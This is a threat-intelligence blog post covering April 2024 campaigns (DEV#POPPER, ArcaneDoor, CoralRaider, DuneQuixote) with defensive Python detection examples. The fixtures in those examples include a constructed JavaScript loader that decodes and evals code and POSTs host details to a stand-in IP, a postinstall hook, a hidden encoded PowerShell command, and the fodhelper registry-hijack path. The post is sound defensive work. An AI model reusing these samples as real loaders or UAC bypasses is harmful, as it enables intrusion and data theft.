Top Middle East Cyber Threats – April 30, 2024  

At Help AG, our Managed Security Services (MSS) team offers 24x7x365 monitoring of complex IT security infrastructures to some of the largest enterprises in the region. As a result, we have our eyes keenly fixed on the cybersecurity threat landscape and are among the first in the region to learn and act upon new threats. 

In this blog post, we share the top cybersecurity threats our MSS team has recently come across, so read on to learn what to look out for in the weeks ahead.

New Attack Campaign Targets Software Developers  

Securonix Threat Research (STR) is tracking an ongoing social engineering campaign, DEV#POPPER, likely associated with North Korean threat actors, that targets software developers with fake job interviews in order to deliver a Python-based RAT. The attackers stage their malicious code on well-known code repositories so that the "coding task" looks legitimate to the candidate.

In the first stage the "interviewer" sends the candidate a zip archive hosted on GitHub, presented as a take-home task. The archive contains heavily obfuscated JavaScript that executes further malicious files in the attack chain and gathers system and network information about the host. This information is assembled in a JSON-like format and sent to the attacker's C2 server in a carefully crafted HTTP POST request.

The JavaScript then decodes and executes a second, much longer string that carries most of the functionality. Once running, this stage behaves as a Remote Access Trojan (RAT), allowing the attacker to interact with the victim's machine remotely.
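
The practical defence for a developer is to triage a "take-home task" archive statically before running `npm install` or `node` on it. The following Python script is an added example for this write-up, not code from the advisory or from Securonix: it flags the traits described above (decode-and-eval layers, host fingerprinting through the `os` module, HTTP POST to a remote host, child-process execution) and also lists npm lifecycle hooks, which run automatically on `npm install` before anyone reads the code. The regexes, chain names and verdict levels are this example's own assumptions, and the sample JavaScript and package.json are constructed, not real DEV#POPPER artefacts.

```python
"""Static triage of an untrusted 'coding task' repository before it is run.

Added example, not code from the advisory or from Securonix. Indicator
patterns and verdict thresholds are assumptions for illustration.
"""
import json
import re
from dataclasses import dataclass
from pathlib import Path


@dataclass
class Finding:
    rule: str
    line: int
    excerpt: str


# Per-line indicator regexes: triage heuristics, not malware signatures.
RULES = [
    ("dynamic-eval", re.compile(r"\b(eval|Function)\s*\(")),
    ("base64-decode", re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]\)|\batob\s*\(")),
    ("child-process", re.compile(r"require\(\s*['\"]child_process['\"]\s*\)|\b(execSync|spawnSync|exec|spawn)\s*\(")),
    ("host-fingerprint", re.compile(r"\bos\.(hostname|platform|userInfo|networkInterfaces|arch|release)\s*\(")),
    ("http-post", re.compile(r"\bmethod\s*:\s*['\"]POST['\"]|\bhttps?\.request\s*\(")),
    ("hex-escape-string", re.compile(r"(\\x[0-9a-fA-F]{2}){8,}")),
    ("long-opaque-literal", re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]")),
]
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def scan_source(src: str) -> list[Finding]:
    """Return one Finding per (line, rule) match in a JavaScript source string."""
    findings = []
    for n, line in enumerate(src.splitlines(), 1):
        for name, rx in RULES:
            if rx.search(line):
                findings.append(Finding(name, n, line.strip()[:80]))
    return findings


def scan_package_json(text: str) -> list[str]:
    """Return the lifecycle hooks in package.json that execute on npm install."""
    scripts = json.loads(text).get("scripts", {})
    return [h for h in INSTALL_HOOKS if h in scripts]


def verdict(findings: list[Finding], hooks: list[str]) -> dict:
    """Combine single indicators into the behaviour chains that actually matter."""
    hit = {f.rule for f in findings}
    chains = []
    if "dynamic-eval" in hit and hit & {"base64-decode", "hex-escape-string", "long-opaque-literal"}:
        chains.append("decode-then-execute")
    if "host-fingerprint" in hit and "http-post" in hit:
        chains.append("fingerprint-and-exfiltrate")
    if "child-process" in hit and "dynamic-eval" in hit:
        chains.append("command-execution-from-dynamic-code")
    if hooks and hit:
        chains.append("runs-on-npm-install")
    level = "block" if chains else ("review" if hit or hooks else "clean")
    return {"level": level, "rules": sorted(hit), "hooks": hooks, "chains": chains}


def scan_tree(root: str) -> dict:
    """Walk an unpacked archive. node_modules is deliberately included: a planted
    dependency is exactly where a malicious file would hide."""
    findings, hooks = [], []
    for p in Path(root).rglob("*"):
        if not p.is_file():
            continue
        if p.suffix in (".js", ".cjs", ".mjs"):
            findings += scan_source(p.read_text(errors="replace"))
        elif p.name == "package.json":
            hooks += scan_package_json(p.read_text(errors="replace"))
    return verdict(findings, hooks)


# Constructed sample input (not a real DEV#POPPER artefact): a stage-one loader
# with the traits the advisory describes, and a package.json that runs it.
SAMPLE_JS = r'''const os = require("os");
const { execSync } = require("child_process");
const info = { host: os.hostname(), plat: os.platform(), user: os.userInfo().username };
const stage2 = Buffer.from("dmFyIGE9MTs=", "base64").toString();
new Function(stage2)();
const req = require("https").request({ hostname: "203.0.113.10", method: "POST", path: "/api" });
req.end(JSON.stringify(info));
'''
SAMPLE_PACKAGE_JSON = '{"name": "coding-task", "scripts": {"postinstall": "node setup.js", "test": "jest"}}'
BENIGN_JS = 'const express = require("express");\napp.post("/login", (req, res) => res.send("ok"));\n'

if __name__ == "__main__":
    print(verdict(scan_source(SAMPLE_JS), scan_package_json(SAMPLE_PACKAGE_JSON)))
    print(verdict(scan_source(BENIGN_JS), []))
```

The point of `verdict` is that none of the single indicators is damning on its own (plenty of legitimate packages use `child_process` or `Buffer.from`), but the combinations are: decode-then-execute next to host fingerprinting and an outbound POST is the loader pattern described above, and a `postinstall` hook means it fires without the candidate ever opening a file. Anything rated `block` should be run, if at all, only in a disposable VM with no credentials or SSH keys on it.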

RECOMMENDATIONS 

  • Ensure all systems are patched and updated.
  • Avoid clicking or opening untrusted or unknown links, files, or attachments.
  • Don't allow macros in unknown MS Office files.
  • Enable software restriction policies and application whitelisting.
  • Ensure that your email server is configured to block suspicious files.
  • Enforce the Restricted PowerShell script execution policy for end users.
  • Monitor your network for abnormal behaviours and IoCs.
  • Ensure frequent backups are in place.
  • Educate employees about detecting and reporting phishing and other suspicious emails.

Google Chrome Update Fixes Multiple Vulnerabilities 

Google has published a security update for the Chrome browser that addresses multiple vulnerabilities. The fixes are included in version 124.0.6367.78/.79 for Windows and Mac and 124.0.6367.78 for Linux.

The update includes four security fixes, three of which were reported by external researchers. Of these three, one is rated critical and two are rated high.

RECOMMENDATIONS 

  • Ensure all systems are patched and updated: confirm that Chrome is at version 124.0.6367.78 or later (chrome://settings/help shows the installed version and triggers the update; the browser must be restarted for the update to take effect).


New Espionage Campaign Targets Perimeter Network Devices 

A state-sponsored campaign named ArcaneDoor has been targeting perimeter network devices from multiple vendors for espionage. Because these devices sit at the network edge and carry all traffic in and out of an organisation, a compromised device gives the attacker a foothold into the internal network and the ability to reroute or modify traffic and to monitor communications.

The campaign came to light in early 2024 when a vigilant customer raised concerns about their Cisco Adaptive Security Appliances (ASA). A subsequent in-depth investigation identified a previously unknown actor, now designated as UAT4356 by Cisco Talos and STORM-1849 by the Microsoft Threat Intelligence Center. This actor demonstrated sophisticated espionage capabilities and deep technical knowledge of the targeted devices. 

UAT4356 deployed two custom backdoors as part of its toolkit: "Line Dancer", an in-memory implant, and "Line Runner", a persistence mechanism that survives reboots. Together they were used for configuration modification, reconnaissance, network traffic capture, data exfiltration and potentially lateral movement within the network.

RECOMMENDATIONS 

  • Ensure all systems are patched and updated. 
  • Enable software restriction policies and application whitelisting. 
  • Monitor your network for abnormal behaviours and IoCs. 
  • Ensure frequent backups are in place. 

CoralRaider Executes Infostealer Malware Distribution Through CDN 

A new campaign, active since at least February 2024, has been identified in which a threat actor distributes three well-known information stealers: Cryptbot, LummaC2 and Rhadamanthys.

The campaign uses a Content Delivery Network (CDN) cache domain as its download server, hosting both the malicious HTA file and the final payload.

Researchers have assessed with moderate confidence that the threat actor CoralRaider operates this campaign, based on multiple overlaps in tactics, techniques and procedures (TTPs) with CoralRaider's Rotbot campaign: the initial vector of a Windows Shortcut (LNK) file, the intermediate PowerShell decryptor and payload-download scripts, and the fodhelper.exe technique used to bypass User Account Control (UAC) on the victim machine.
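
The chain above (LNK opened from Explorer, hidden PowerShell, fodhelper.exe UAC bypass) leaves a recognisable trail in endpoint telemetry. The following Python is an added example, not code from the advisory or from Cisco Talos: it runs three rules over constructed events modelled loosely on Sysmon Event ID 1 (process creation) and Event ID 13 (registry value set) and correlates them per host. The field names follow Sysmon's, but the hostnames, SIDs, command lines and the 300-second correlation window are this example's own assumptions. The registry path is the one the fodhelper bypass abuses: fodhelper.exe is auto-elevated and resolves the ms-settings: handler through HKCU\Software\Classes, which a medium-integrity process may write.

```python
"""Detection rules for the LNK -> PowerShell -> fodhelper UAC-bypass chain.

Added example, not code from the advisory or from Cisco Talos. Event data is
constructed; field names follow Sysmon Event ID 1 and 13.
"""
import re
from collections import defaultdict

POWERSHELL = re.compile(r"\\(powershell|pwsh)(\.exe)?$", re.I)
# Hidden window or an encoded command line, both typical of shortcut-launched loaders.
HIDDEN_OR_ENCODED = re.compile(
    r"(^|\s)-(w(indowstyle)?\s+hidden|e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,})", re.I)
# The ms-settings protocol handler that fodhelper.exe looks up under HKCU\Software\Classes.
MS_SETTINGS_HANDLER = re.compile(r"\\Software\\Classes\\ms-settings\\Shell\\Open\\command(\\|$)", re.I)


def classify(event: dict) -> list[str]:
    """Return the names of the single-event rules this event matches."""
    hits = []
    if event["EventID"] == 1:
        image, parent, cmd = event["Image"], event["ParentImage"], event["CommandLine"]
        if POWERSHELL.search(image) and parent.lower().endswith("\\explorer.exe") and HIDDEN_OR_ENCODED.search(cmd):
            hits.append("explorer-spawned-hidden-powershell")   # user double-clicked the LNK
        if parent.lower().endswith("\\fodhelper.exe"):
            hits.append("fodhelper-child-process")              # the elevated payload
    elif event["EventID"] == 13:
        if MS_SETTINGS_HANDLER.search(event["TargetObject"]):
            hits.append("ms-settings-handler-hijack")           # the bypass being staged
    return hits


def correlate(events: list[dict], window_s: int = 300) -> dict:
    """Group rule hits per host; severity is raised to high when the handler hijack
    is followed by a fodhelper child process within window_s seconds."""
    per_host = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        for rule in classify(e):
            per_host[e["host"]].append((e["ts"], rule))
    alerts = {}
    for host, hits in per_host.items():
        staged = [ts for ts, r in hits if r == "ms-settings-handler-hijack"]
        fired = [ts for ts, r in hits if r == "fodhelper-child-process"]
        chain = any(0 <= f - s <= window_s for s in staged for f in fired)
        alerts[host] = {"severity": "high" if chain else "medium",
                        "rules": sorted({r for _, r in hits})}
    return alerts


# Constructed sample telemetry (assumed hosts, SIDs and paths; ts in seconds).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    # WS-042: the full chain. The -enc argument is a made-up placeholder.
    {"host": "WS-042", "EventID": 1, "ts": 1000, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -nop -w hidden -ep bypass -enc SQBFAFgAIADEAA=="},
    {"host": "WS-042", "EventID": 13, "ts": 1004,
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\Classes\ms-settings\Shell\Open\command\DelegateExecute"},
    {"host": "WS-042", "EventID": 13, "ts": 1004,
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\Classes\ms-settings\Shell\Open\command\(Default)"},
    {"host": "WS-042", "EventID": 1, "ts": 1005, "Image": r"C:\Windows\System32\fodhelper.exe",
     "ParentImage": PS, "CommandLine": "fodhelper.exe"},
    {"host": "WS-042", "EventID": 1, "ts": 1006, "Image": PS, "ParentImage": r"C:\Windows\System32\fodhelper.exe",
     "CommandLine": r"powershell.exe -w hidden -f C:\Users\Public\stage2.ps1"},
    # WS-017: routine management PowerShell and an unrelated per-user registry write.
    {"host": "WS-017", "EventID": 1, "ts": 2000, "Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\Mgmt\inventory.ps1"},
    {"host": "WS-017", "EventID": 13, "ts": 2001,
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1002\Software\Classes\.txt\OpenWithList\a"},
]

if __name__ == "__main__":
    for host, alert in correlate(EVENTS).items():
        print(host, alert)
```

Two design notes. The PowerShell rule is deliberately narrow (parent must be explorer.exe, and the command line must hide its window or carry an encoded command) so that management scripts launched by a service, as on WS-017, do not fire it; a rule on `-ExecutionPolicy Bypass` alone would be pure noise. The registry rule, by contrast, is deliberately broad: no legitimate software should write under ms-settings\Shell\Open\command in a user hive, so any write there is worth an alert, and a fodhelper.exe child process shortly afterwards turns it into a confirmed UAC bypass.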

RECOMMENDATIONS 

  • Ensure all systems are patched and updated.
  • Avoid clicking or opening untrusted or unknown links, files, or attachments.
  • Don't allow macros in unknown MS Office files.
  • Enable software restriction policies and application whitelisting.
  • Ensure that your email server is configured to block suspicious files.
  • Enforce the Restricted PowerShell script execution policy for end users.
  • Monitor your network for abnormal behaviours and IoCs.
  • Ensure frequent backups are in place.
  • Educate employees about detecting and reporting phishing and other suspicious emails.


DuneQuixote Campaign Targets Government Entities in the Middle East 

Kaspersky has identified a new malware campaign named "DuneQuixote" targeting government entities in the Middle East. The investigation has uncovered over 30 DuneQuixote dropper samples actively used in the campaign, in two variants: a regular dropper and tampered installer files posing as legitimate software such as "Total Commander". Both contain malicious code designed to download an additional payload, the "CR4T" backdoor.

The initial dropper is a Windows x64 executable or DLL written in C/C++. On execution, it issues a series of decoy API calls to frustrate analysis. The tampered Total Commander installer adds further anti-analysis measures, including checks that suppress any connection attempt to the command-and-control (C2) infrastructure under specific conditions.

The CR4T backdoor gives the attacker a command shell on the compromised host. It launches a cmd.exe process and creates two named pipes for inter-process communication with it. It then talks to the C2 server over HTTP, using the hardcoded string "TroubleShooter" as the User-Agent on its requests.
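
A hardcoded User-Agent is the kind of indicator that is trivial to hunt for in web-proxy logs, and it generalises: a backdoor whose string is not yet known still tends to stand out as a user agent seen from a single host. The following Python is an added example for this write-up, not code from the advisory or from Kaspersky. The only indicator it takes from the advisory is the string "TroubleShooter"; the log format, the sample lines, the source addresses and URLs, and the rarity threshold are this example's own assumptions (a real proxy such as Squid or Zscaler needs its own parser, but the hunt logic is the same).

```python
"""Hunt for CR4T beaconing in web-proxy logs: exact match on the known
User-Agent, plus a rarity table to surface unknown hardcoded agents.

Added example, not code from the advisory or from Kaspersky. Log format and
sample data are constructed.
"""
import re
from collections import defaultdict
from typing import Optional

# Assumed log layout: timestamp src_ip method url status bytes "user-agent"
LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) (\d+) "([^"]*)"$')
IOC_USER_AGENT = "TroubleShooter"   # hardcoded by CR4T, per the advisory


def parse(line: str) -> Optional[dict]:
    """Parse one proxy log line; return None for lines that do not fit the layout."""
    m = LINE.match(line.strip())
    if not m:
        return None
    ts, src, method, url, status, size, ua = m.groups()
    return {"ts": ts, "src": src, "method": method, "url": url,
            "status": int(status), "bytes": int(size), "ua": ua}


def hunt(lines, ioc_ua: str = IOC_USER_AGENT, max_hosts: int = 1) -> dict:
    """Return per-source IoC matches (count, URLs, first/last seen) and a table of
    user agents observed from at most `max_hosts` distinct sources."""
    ioc = defaultdict(lambda: {"count": 0, "urls": set(), "first": None, "last": None})
    hosts_by_ua = defaultdict(set)
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        hosts_by_ua[rec["ua"]].add(rec["src"])
        if rec["ua"] == ioc_ua:          # exact and case-sensitive: the string is hardcoded
            h = ioc[rec["src"]]
            h["count"] += 1
            h["urls"].add(rec["url"])
            h["first"] = h["first"] or rec["ts"]
            h["last"] = rec["ts"]
    rare = {ua: sorted(hosts) for ua, hosts in hosts_by_ua.items()
            if len(hosts) <= max_hosts and ua != ioc_ua}
    return {"ioc_hits": dict(ioc), "rare_agents": rare}


# Constructed sample log (addresses from documentation ranges; not real traffic).
CHROME = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0.0.0"
SAMPLE_LOG = [
    f'2024-04-18T08:01:12Z 10.20.30.41 GET http://update.example.net/check 200 512 "{CHROME}"',
    f'2024-04-18T08:01:15Z 10.20.30.42 GET http://intranet.example.net/ 200 2048 "{CHROME}"',
    '2024-04-18T08:02:03Z 10.20.30.41 POST http://203.0.113.55/api/ping 200 128 "TroubleShooter"',
    '2024-04-18T08:02:33Z 10.20.30.41 POST http://203.0.113.55/api/ping 200 128 "TroubleShooter"',
    f'2024-04-18T08:03:00Z 10.20.30.43 GET http://cdn.example.net/lib.js 200 9000 "{CHROME}"',
    '2024-04-18T08:03:10Z 10.20.30.44 GET http://203.0.113.77/t 404 0 "Microsoft-CryptoAPI/10.0"',
    '2024-04-18T08:03:11Z 10.20.30.45 GET http://203.0.113.77/t 404 0 "Microsoft-CryptoAPI/10.0"',
    '2024-04-18T08:04:00Z 10.20.30.46 GET http://203.0.113.99/x 200 64 "curl/8.5.0"',
    'this line is malformed and is skipped',
]

if __name__ == "__main__":
    result = hunt(SAMPLE_LOG)
    for src, h in result["ioc_hits"].items():
        print(f"IoC hit: {src} {h['count']}x to {sorted(h['urls'])} between {h['first']} and {h['last']}")
    for ua, hosts in result["rare_agents"].items():
        print(f"Rare agent {ua!r} seen only from {hosts}")
```

On the sample, the IoC match isolates one workstation (10.20.30.41) that is otherwise browsing normally, together with the URL and time span needed to scope the incident. The rarity table also surfaces `curl/8.5.0` from a single host; that is not evidence of compromise, but it is the review queue a hunter works through, and it is where the next backdoor's hardcoded string will appear before anyone has published it.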

RECOMMENDATIONS 

  • Ensure all systems are patched and updated.
  • Avoid clicking or opening untrusted or unknown links, files, or attachments.
  • Don't allow macros in unknown MS Office files.
  • Enable software restriction policies and application whitelisting.
  • Ensure that your email server is configured to block suspicious files.
  • Enforce the Restricted PowerShell script execution policy for end users.
  • Monitor your network for abnormal behaviours and IoCs.
  • Ensure frequent backups are in place.
  • Educate employees about detecting and reporting phishing and other suspicious emails.


REFERENCES 

https://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors/ 

https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop_24.html 

https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/ 

https://blog.talosintelligence.com/suspected-coralraider-continues-to-expand-victimology-using-three-information-stealers/ 

https://securelist.com/dunequixote/112425/ 
